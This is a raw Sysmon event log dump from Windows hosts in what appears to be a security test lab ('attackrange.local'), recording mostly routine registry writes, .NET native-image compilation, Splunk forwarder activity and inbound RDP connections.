13241300x800000000000000076067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.076{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{6240EF28-7EAB-4dc7-A5E3-7CFB35EFB34D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.045{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5E90CC8B-E402-4350-82D7-996E92010608}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:45.030{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5CBA34AE-E344-40CF-B61D-FBA4D0D1FF54}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 23542300x800000000000000076064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.030{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=66A15966901184A68717C990AEF3EBE1,SHA256=6B8713D662F9F2E24DC8C7EFC8BB4EF52673E7FF701A5C3047012C6AC3936786,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000076063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.998{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{5512D124-5CC6-11CF-8D67-00AA00BDCE1D}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 354300x800000000000000050315Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:43.549{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-56265-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050314Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:45.536{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC9D410DDABF2B2EAC5C0F37DC652611,SHA256=EF132F78F72D563E65D7FCE75D63B4D30051CBCD0E2B7366DD83B4AB04DC50EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000076130Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.951{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-470D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076129Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.936{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-470D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076128Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.936{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-470D-00000000BB01}736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076127Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:46.905{A7A01FEF-EBEA-607E-460D-00000000BB01}2860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b2c-0\Microsoft.VisualStudio.Tools.Applications.Runtime.dll2021-04-20 14:57:46.905 10341000x800000000000000076126Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.842{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-460D-00000000BB01}2860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076125Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.826{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-460D-00000000BB01}2860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076124Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.826{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-460D-00000000BB01}2860C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000076123Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.795{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-450D-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076122Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.780{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-450D-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076121Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.780{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-450D-00000000BB01}1560C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000076120Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:46.733{A7A01FEF-EBEA-607E-440D-00000000BB01}3828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\ef4-0\Microsoft.VisualStudio.Tools.Applications.Hosting.dll2021-04-20 14:57:46.733 354300x800000000000000076119Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.284{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57541-false10.0.1.12-8000- 354300x800000000000000076118Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:45.106{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com53019-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000076117Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.514{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-440D-00000000BB01}3828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076116Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.498{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-440D-00000000BB01}3828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076115Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.498{A7A01FEF-EBDA-607E-C60C-00000000BB01}35121112C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-440D-00000000BB01}3828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000076114Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.452{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-430D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076113Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.436{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-430D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076112Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.436{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-430D-00000000BB01}2088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076111Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.405{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBEA-607E-420D-00000000BB01}5772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076110Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.389{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBEA-607E-420D-00000000BB01}5772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076109Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.389{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBEA-607E-420D-00000000BB01}5772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000076108Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.327{A7A01FEF-EBE9-607E-410D-00000000BB01}4436NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3JAFLKCG03\Microsoft.VisualBasic.Compatibility.Data.ni.dll.auxMD5=3A21107FC26C416AF1EB7BCBAC7F9513,SHA256=3339B060926DC10273D78A7E7E0CCD31A6466D618A2C8DFAFB82BD9EA3E6019E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000076107Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.327{A7A01FEF-EBE9-607E-410D-00000000BB01}4436NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\3JAFLKCG03\Microsoft.VisualBasic.Compatibility.Data.ni.dllMD5=EBFC8E1D68A42F9C561793DBA9398F34,SHA256=04F7A5B85C526C21D3C5827771EBB45E8FD5863D8BF601B0C682842458A66B3E,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000076106Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:57:46.311{A7A01FEF-EBE9-607E-410D-00000000BB01}4436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1154-0\Microsoft.VisualBasic.Compatibility.Data.dll2021-04-20 14:57:46.311 23542300x800000000000000076105Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:46.045{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 